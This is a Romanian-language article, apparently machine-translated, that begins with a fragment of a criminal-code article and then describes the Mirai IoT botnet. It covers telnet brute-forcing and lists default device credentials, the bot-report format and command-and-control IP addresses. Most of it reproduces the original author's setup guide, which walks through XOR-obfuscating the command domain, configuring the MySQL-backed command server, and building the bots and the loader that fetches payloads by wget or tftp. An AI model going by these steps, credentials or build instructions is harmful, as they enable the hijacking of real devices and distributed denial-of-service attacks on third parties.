se pedepsește cu restrângere de libertate pe un termen de până la patru ani, sau cu muncă obligatorie pe un termen de până la patru ani, ori cu privațiune de libertate pe același termen, cu amendă în mărime de până la 200 mii. ruble, sau în cuantumul salariului sau a oricărui alt venit al persoanei condamnate pe o perioadă de până la optsprezece luni.

2. Faptele prevăzute la prima parte a prezentului articol, săvârșite de un grup de persoane prin acord prealabil sau de un grup organizat, ori de o persoană care uzează funcția sa oficială, precum și care au cauzat prejudicii majore sau săvârșite din interes egoist. , -

se pedepsește cu restrângerea libertății pe un termen de până la patru ani sau cu muncă forțată pe un termen de până la cinci ani, cu sau fără privarea de dreptul de a ocupa anumite funcții sau de a se angaja în anumite activități pe un termen de până la trei ani; sau închisoare pe un termen de până la cinci ani, cu amendă în valoare de o sută de mii până la două sute de mii de ruble sau în valoare de salariu sau alte venituri ale persoanei condamnate pe o perioadă de doi până la trei ani sau fără aceasta și cu privarea de dreptul de a ocupa anumite funcţii sau de a se angaja în anumite activităţi pe o perioadă de până la trei ani sau fără aceasta.

3. Faptele prevăzute la alineatele unu sau doi din prezentul articol, dacă au produs consecințe grave sau au creat amenințarea producerii lor, -

se pedepsește cu privațiune de libertate pe o perioadă de până la șapte ani.

Acest botnet este format în principal din camere, dispozitive DVR etc.

Infecția este destul de simplă: Internetul este scanat pentru porturi deschise 80/23 (web/telnet) și sunt selectate conturi codificate.

Puțini dintre utilizatori schimbă parolele conturilor încorporate (dacă este posibil), astfel încât botnet-ul este actualizat în mod constant cu dispozitive noi. Dacă puteți schimba parola de pe interfața web în timp ce sunteți în ea, atunci parola și chiar prezența accesului telnet eludează pur și simplu mulți utilizatori.

Cele mai frecvent utilizate conturi sunt:

activare:sistem
shell:sh
admin:admin
rădăcină:xc3511
rădăcină:vizxv
root:admin
root:xmhdipc
rădăcină: 123456
rădăcină: 888888
sprijin: sprijin
rădăcină: 54321
root:juantech
rădăcină:anko
rădăcină: 12345
admin:
root:implicit
parola administratorului
rădăcină:rădăcină
rădăcină:
utilizator:utilizator
admin:smcadmin
root:pass
admin:admin1234
rădăcină: 1111
invitat:12345
rădăcină: 1234
rădăcină:parolă
rădăcină: 666666
admin:1111
serviciu:serviciu
rădăcină:sistem
supraveghetor:supervizor
rădăcină: klv1234
administrator:1234
rădăcină:ikwb
rădăcină: Zte521

După obținerea accesului, centrul de comandă primește o notificare binară despre prezența unui nou bot:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (adresa gazdei a fost aici)
05 = Tab
17 = 23 (Port 23 Telnet)
05 = Tab
61 64 6d 69 6e = nume utilizator:admin admin
05= Tab
61 64 6d 69 6e = parola utilizator: admin

Componentele botnetului sunt proiectate să funcționeze în diferite medii, așa cum demonstrează eșantioanele identificate:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

Serverele C&C sunt fixate în prezent la următoarele adrese:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

Instrucțiunile pentru crearea unui botnet sunt destul de simple, le dau ca atare (sursa http://pastebin.com/E90i6yBB):

Salutare tuturor,

Când am intrat pentru prima dată în industria DDoS, nu plănuiam să rămân mult timp în ea. Mi-am făcut banii, sunt mulți ochi care se uită la IOT acum, așa că este timpul să GTFO. Cu toate acestea, știu fiecare derapaj și mama lor, este visul lor umed să aibă ceva în afară de qbot.

Așa că astăzi, am o lansare uimitoare pentru tine. Cu Mirai, de obicei scot maxim 380.000 de roboți numai din telnet. Cu toate acestea, după DDoS Kreb, ISP-urile se închideau încet și își curățau activitatea. Astăzi, tracțiunea maximă este de aproximativ 300.000 de boți și scade.

Deci, eu sunt senpai-ul tău și te voi trata foarte frumos, hf-chan al meu.

Și tuturor celor care au crezut că fac orice lovind CNC-ul meu, am râs bine, acest bot folosește domeniul pentru CNC. Durează 60 de secunde pentru ca toți roboții să se reconnecteze lol

De asemenea, strigă la această postare pe blog de malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Am avut mult respect pentru tine, am crezut că ești un bun inversor, dar ai eșuat complet și total în a inversa acest binar. „Încă avem kung fu mai bun decât voi, copii” nu mă faceți să râd, ați făcut atâtea greșeli și chiar ați confundat niște binare diferite cu ale mele. laugh out Loud

Lasă-mă să-ți dau niște palme înapoi
1) portul 48101 nu este pentru conexiunea înapoi, este pentru control pentru a preveni mai multe instanțe de bot care rulează împreună
2) /dev/watchdog și /dev/misc nu sunt pentru „a face întârzierea”, ci pentru a preveni blocarea sistemului. Acesta este un fruct de jos, atât de trist încât ești extrem de prost
3) Ai eșuat și ai crezut că FAKE_CNC_ADDR și FAKE_CNC_PORT sunt CNC reale, lol "Și fac ușa din spate pentru a te conecta prin HTTP pe 65.222.202.53". te-ai împiedicat de fluxul de semnal ;) încearcă mai mult skiddo
4) Instrumentul tău cu scheletul naște, credea că decodorul de atac este „stil sinden”, dar nici măcar nu folosește un protocol bazat pe text? CNC și bot comunică prin protocol binar
5) spui „chroot(“/”) atât de previzibil ca torlus, dar nu înțelegi, alții ucid pe baza cwd. Arată cât de ieșit din circuit sunteți cu malware real. Întoarce-te la teren de derapaj

De ce scrieți instrumente de inginerie inversă? Nici măcar nu poți inversa corect în primul rând. Vă rugăm să învățați mai întâi unele abilități înainte de a încerca să-i impresionați pe alții. Aroganța ta de a declara modul în care „m-ai bătut” cu declarația ta proastă de kung-fu m-a făcut să râd atât de tare în timp ce mănânc că a trebuit să mă mângâie pe spate.

Așa cum eu fiu pentru totdeauna liber, vei fi condamnat la mediocrație pentru totdeauna.

Cerințe
2 servere: 1 pentru CNC + mysql, 1 pentru receptor de scanare și 1+ pentru încărcare

Cerințe OP
2 VPS și 4 servere
— 1 VPS cu gazdă extrem de rezistentă la glonț pentru serverul de baze de date
- 1 VPS, rootkit, pentru scanReceiver și distribuitor
- 1 server pentru CNC (folosit ca 2% CPU cu 400k boți)
- 3x servere NForce de 10 gbps pentru încărcare (distribuitorul distribuie la 3 servere în mod egal)

— Pentru a stabili conexiunea la CNC, boții rezolvă un domeniu (resolv.c/resolv.h) și se conectează la acea adresă IP
- Bots brute telnet care utilizează un scaner SYN avansat, care este de aproximativ 80 de ori mai rapid decât cel din qbot și utilizează aproape de 20 de ori mai puține resurse. Când găsește rezultat bruted, bot rezolvă un alt domeniu și îl raportează. Acesta este legat la un server separat pentru a se încărca automat pe dispozitive pe măsură ce apar rezultate.
- Rezultatele brute sunt trimise implicit pe portul 48101. Utilitarul numit scanListen.go în instrumente este folosit pentru a primi rezultate brute (obțineam aproximativ 500 de rezultate brute pe secundă la vârf). Dacă construiți în modul de depanare, ar trebui să vedeți binarul scanListen de utilitate care apare în folderul de depanare.

Mirai folosește un mecanism de răspândire similar cu auto-repetiția, dar ceea ce eu numesc „încărcare în timp real”. Practic, rezultatele brute de boți le trimit la un server care ascultă cu utilitarul scanListen, care trimite rezultatele la încărcător. Această buclă (brute -> scanListen -> load -> brute) este cunoscută ca încărcare în timp real.

Încărcătorul poate fi configurat să utilizeze mai multe adrese IP pentru a evita epuizarea portului în Linux (există un număr limitat de porturi disponibile, ceea ce înseamnă că nu există suficientă variație în tuplu pentru a obține mai mult de 65k conexiuni de ieșire simultane - în teorie, acest lot de valoare Mai puțin). Aș avea poate 60k - 70k conexiuni de ieșire simultane (încărcare simultană) răspândite pe 5 IP-uri.
Botul are mai multe opțiuni de configurare care sunt ascunse în (table.c/table.h). În ./mirai/bot/table.h puteți găsi cele mai multe descrieri pentru opțiunile de configurare. Cu toate acestea, în ./mirai/bot/table.c există câteva opțiuni pe care *trebuie* să le modificați pentru a funcționa.

- TABLE_CNC_DOMAIN - Numele de domeniu al CNC la care să se conecteze - Evitarea DDoS foarte distractiv cu mirai, oamenii încearcă să-mi lovească CNC-ul, dar îl actualizez mai repede decât pot găsi IP-uri noi, lol. intarziati :)
- TABLE_CNC_PORT - Portul la care se conectează, este deja setat la 23
- TABLE_SCAN_CB_DOMAIN - Când găsiți rezultate brute, acest domeniu este raportat
- TABLE_SCAN_CB_PORT - Port la care se conectează pentru rezultate brute, este deja setat la 48101.

În ./mirai/tools veți găsi ceva numit enc.c — Trebuie să compilați acest lucru pentru a scoate lucrurile pe care să le puneți în fișierul table.c

Rulați acest director în interiorul mirai

./build.sh depanare telnet

Dacă nu le-ați configurat, veți primi unele erori legate de faptul că nu există compilatoare încrucișate. Acest lucru este ok, nu va afecta compilarea instrumentului enc

Acum, în folderul ./mirai/debug, ar trebui să vedeți un binar compilat numit enc. De exemplu, pentru a obține un șir ofuscat pentru numele de domeniu la care roboții să se conecteze, utilizați acest lucru:

./debug/enc string fuck.the.police.com
Ieșirea ar trebui să arate așa

XOR se fac 20 de octeți de date...
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Pentru a actualiza valoarea TABLE_CNC_DOMAIN, de exemplu, înlocuiți acel șir lung hex cu cel furnizat de instrumentul enc. De asemenea, vedeți „XOR-ing 20 bytes of data”. Această valoare trebuie să înlocuiască bine ultimul argument. Deci, de exemplu, linia table.c arată inițial așa
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
Acum că știm valoarea din instrumentul enc, o actualizăm astfel

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22",); //fuck.the.police.com
Unele valori sunt șiruri de caractere, altele sunt port (uint16 în ordinea rețelei / big endian).
CONFIGURAȚI CNC-UL:
apt-get install mysql-server mysql-client

CNC necesită o bază de date pentru a funcționa. Când instalați baza de date, intrați în ea și executați următoarele comenzi:
http://pastebin.com/86d0iL9g

Aceasta va crea o bază de date pentru dvs. Pentru a adăuga utilizatorul dvs

INSERT INTO user VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Acum, accesați fișierul ./mirai/cnc/main.go

Editați aceste valori
const DatabaseAddr șir = „127.0.0.1”
const DatabaseUser șir = „rădăcină”
const DatabasePass șir = „parolă”
const DatabaseTable string = "mirai"
La informațiile pentru serverul mysql pe care tocmai l-ați instalat

Compilatoarele încrucișate sunt ușoare, urmați instrucțiunile de la acest link pentru a le configura. Trebuie să reporniți sistemul sau să reîncărcați fișierul .bashrc pentru ca aceste modificări să aibă efect.

http://pastebin.com/1rRCc3aD
CNC, bot și instrumente aferente:
http://dopefile.pk/a9f2n9ewk8om
Cum se construiește bot + CNC
În folderul Mirai, există scriptul build.sh.
./build.sh depanare telnet

Va scoate fișierele binare de depanare ale botului care nu vor daemoniza și vor tipări informații despre dacă se poate conecta la CNC, etc., starea inundațiilor etc. Compilează în folderul ./mirai/debug
./build.sh lansează telnet

Va scoate fișiere binare gata de producție ale botului, care sunt extrem de reduse, mici (aproximativ 60K) care ar trebui să fie încărcate pe dispozitive. Compilează toate binarele în format: „mirai.$ARCH” în folderul ./mirai/release

Loader citește intrările telnet din STDIN în următorul format:
ip:portuser:pass
Detectează dacă există wget sau tftp și încearcă să descarce binarul folosind asta. Dacă nu, se va încărca echo un binar mic (aproximativ 1 kb) care va fi suficient ca wget.
./build.sh

Se va construi încărcătorul, optimizat, utilizare în producție, fără tam-tam. Dacă aveți un fișier în formatele utilizate pentru încărcare, puteți face acest lucru
catfile.txt | ./încărcător
Amintiți-vă să limitați!

Doar ca să fie clar, nu ofer niciun fel de tutoriale de ajutor 1 la 1 sau rahat, prea mult timp. Toate scripturile și totul sunt incluse pentru a configura botnetul funcțional în mai puțin de 1 oră. Sunt dispus să vă ajut dacă aveți întrebări individuale (cum de CNC nu se conectează la baza de date, am făcut asta bla bla), dar nu întrebări de genul „Botul meu nu se conectează, rezolvă-l”